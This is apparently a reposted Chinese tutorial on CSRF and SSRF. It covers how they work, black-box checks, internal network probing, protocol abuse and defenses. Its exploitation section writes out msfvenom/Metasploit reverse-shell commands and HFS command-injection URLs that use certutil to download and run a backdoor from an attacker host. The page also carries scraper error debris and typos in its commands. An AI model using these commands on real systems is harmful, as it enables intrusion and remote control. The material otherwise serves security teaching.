39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

02-29 1475阅读 0评论

文章目录

  • CSRF
    • CSRF原理
    • CSRF安全问题黑盒怎么判断
    • SSRF
      • SSRF原理
      • SSRF黑盒可能出现的地方
      • 有SSRF,可以做什么事儿?
      • SSRF漏洞挖掘

        39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

        39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

        CSRF

        39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

        39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用,39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用,词库加载错误:未能找到文件“C:\Users\Administrator\Desktop\火车头9.8破解版\Configuration\Dict_Stopwords.txt”。,访问,注册,管理,第4张
        (图片来源网络,侵删)

        CSRF原理

        39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

        测试CSRF漏洞的工具:CSRFTester

        39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

        39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

        39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

        39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

        39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用,39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用,词库加载错误:未能找到文件“C:\Users\Administrator\Desktop\火车头9.8破解版\Configuration\Dict_Stopwords.txt”。,访问,注册,管理,第10张
        (图片来源网络,侵删)

        CSRFTester设置代理,会抓取新建管理员时向服务器发送的数据包,然后用抓取的数据包构造HTML页面。注意发送注册信息的形式(表单?IMG?)

        CSRF利用流程:获取目标的触发数据包;利用CSRFTester构造导出;诱使受害者访问特定地址触发。

        CSRF安全问题黑盒怎么判断

        1. 看验证来源,也就是是否采用同源策略,看数据包referer的值,本身网站的数据包认定安全,不是本身网站发送的数据包为非法数据包。

          同源策略也不安全,如果改referer的值,同源策略就失效了。

          如何测试同源策略?

          39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

          39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

          从后台点击新建文章肯定允许访问,如果直接从百度访问新建文章的URL,也允许访问,说明不存在同源策略。

        2. 看凭证有无token;

          token值用来判断是不是同一个用户。每操作一次都会更改token值,而且会在操作前对比token值。token值可以有效防御CSRF攻击

          39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

          这里没有token,说明只要是这个用户就行了,不需要证明发送数据包的是不是同一个主机。

          39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

        3. 看关键操作有无验证。

          关键验证就好比,修改密码的时候会验证你的用户名和密码。

        SSRF

        SSRF原理

        39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

        39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

        SSRF漏洞(原理&绕过姿势)

        SSRF就相当于php中的文件包含

        39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

        SSRF黑盒可能出现的地方

        39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

        有SSRF,可以做什么事儿?

        39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

        • 内网扫描

          内网IP有三个段:10段(10.0.0.0-10.255.255.255即10.0.0.0/8)、172段(172.16.0.0-172.31.255.255即172.16.0.0/12)、192段(192.168.0.0-192.168.255.255即192.1688.0.0/16)

          39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

          访问卡了,有两种情况:请求被驳回;请求有数据返回。要是真的不存在,会直接404 not found

        • 协议

          各个语言支持的协议:

          39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

          通过file协议可以读取本地文件,文件路径可以通过网站报错来知道,还可以读取中间件、 系统默认文件。

        • 漏洞利用

          直接利用中间件或其他服务漏洞获取系统权限。这里利用HFS漏洞HFS远程命令执行漏洞

          # 生成后门代码
          msfvrnom -p /winnodws/meterpreter/reverse_http LHOST=x.x.x.x LPORT=6666 -f exe -o xx.exe
          # 监听本机6666端口
          use exploit/multi/handler
          set payload windows/meterpreter/reverse_http
          set lhost 0.0.0.0
          ser lport 6666
          run
          # 远程下载后门文件
          http://127.0.0.1/?search==%00{.exec|cmd /c certutil.exe -urlcache -split -f http://x.x.x.x:6666/xx.exe xx.exe.} 
          # 执行后门文件
          http://127.0.0.1/?search==%00{.exec|cmd /c xx.exe.} 
          

          SSRF漏洞挖掘

          思路:

          • 社交分享qzone.qq.com?url=www.xiaodi8.com,直接改为qzone.qq.com?url=htttp://127.0.0.1来测试SSRF。如果一个网站有预览、快照等图片加载功能功能,说明网站有请求过资源。
          • 地址加载跳转界面,本身网站并不是一个登录界面,它会请求资源地址来加载登录页面。就说明它有触发本地去请求登陆页面,然后把登录页面的资源加载出来。

            39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

            总的来说:如果网站接收你的值,并且会把这个值进行资源访问,就可能存在SSRF。

            SSRF白盒可能出现的地方:

            • 功能点抓包指向代码块审计
            • 功能点函数定位代码块审计

              SSRF常见安全修复防御方案:

              • 禁用跳转
              • 禁用不需要的协议
              • 固定或限制资源地址
              • 错误信息统一信息处理

免责声明
本网站所收集的部分公开资料来源于AI生成和互联网,转载的目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。
文章版权声明:除非注明,否则均为主机测评原创文章,转载或复制请以超链接形式并注明出处。

发表评论

快捷回复: 表情:
评论列表 (暂无评论,1475人围观)

还没有评论,来说两句吧...

目录[+]